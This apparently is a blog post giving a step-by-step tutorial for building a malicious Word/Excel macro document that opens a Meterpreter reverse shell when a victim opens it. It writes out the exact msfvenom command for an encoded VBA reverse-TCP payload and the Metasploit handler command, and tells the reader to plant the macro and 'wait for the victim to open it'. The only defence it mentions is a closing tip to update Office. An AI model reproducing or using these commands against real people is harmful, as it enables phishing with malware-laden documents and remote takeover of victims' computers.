This time I will try to get a meterpreter sessions via MS. Office Word / Excel 2003/2007.
Ip Address Attacker: 192.168.1.5
Victims Ip Address: 192.168.1.8
Preparation:
1. Create a shell code with msfvenom, with encoder x86/shikata_ga_nai
2. Copy exploit and payload into the MS. Office extension. Doc or. Docx
Well first of all we will make it with msfvenom Macro Code:
data:image/s3,"s3://crabby-images/8fcbd/8fcbd11f17216c1d7fab6245a6243fe963f862f2" alt=""
root@root:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=9999 -e shikata_ga_nai -i 3 -f vba > /root/vba.txt
3. Open File vba.txt earlier and we will find 2 code:
MACRO CODE
data:image/s3,"s3://crabby-images/d8550/d8550e9f1a83d293c26fc62e274bb730cc293643" alt=""
PAYLOAD DATA
data:image/s3,"s3://crabby-images/72fdb/72fdb28cdc0a42ce93fd50fd493b1ec77eccfb19" alt=""
4. Then we will enter the exploit and payload into the document, then wait for the victim to open it.
5. Open the file peraturan.doc with microsoft word, then select Tools -> Macros -> Visual Basic editor.dan insert -> module
Open the file vba.txt then copy macros in visual basic code to auditors.
data:image/s3,"s3://crabby-images/ecca8/ecca837e9fd6dd6a68db0aebeee4caa19de69e23" alt=""
6. copy payload code to worksheet :
data:image/s3,"s3://crabby-images/d557e/d557e18cc32f8f96e3bca05c5367329a6f10b6a3" alt=""
7. Prepare Metasploit Listener:
root@root:~# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=9999 E
8. wait until the victim opened the document before and we will get meterpreter sessions :)
data:image/s3,"s3://crabby-images/ce2ee/ce2ee3cc2c687b02054e78bd7aef6b5cada97cc1" alt=""
9.Microsoft has issued patches / updates so ... Office lah update you guys :)
data:image/s3,"s3://crabby-images/e9bff/e9bffd568814bc3ab9b04a5bf2c9b47765284e47" alt=""
0 komentar :
Post a Comment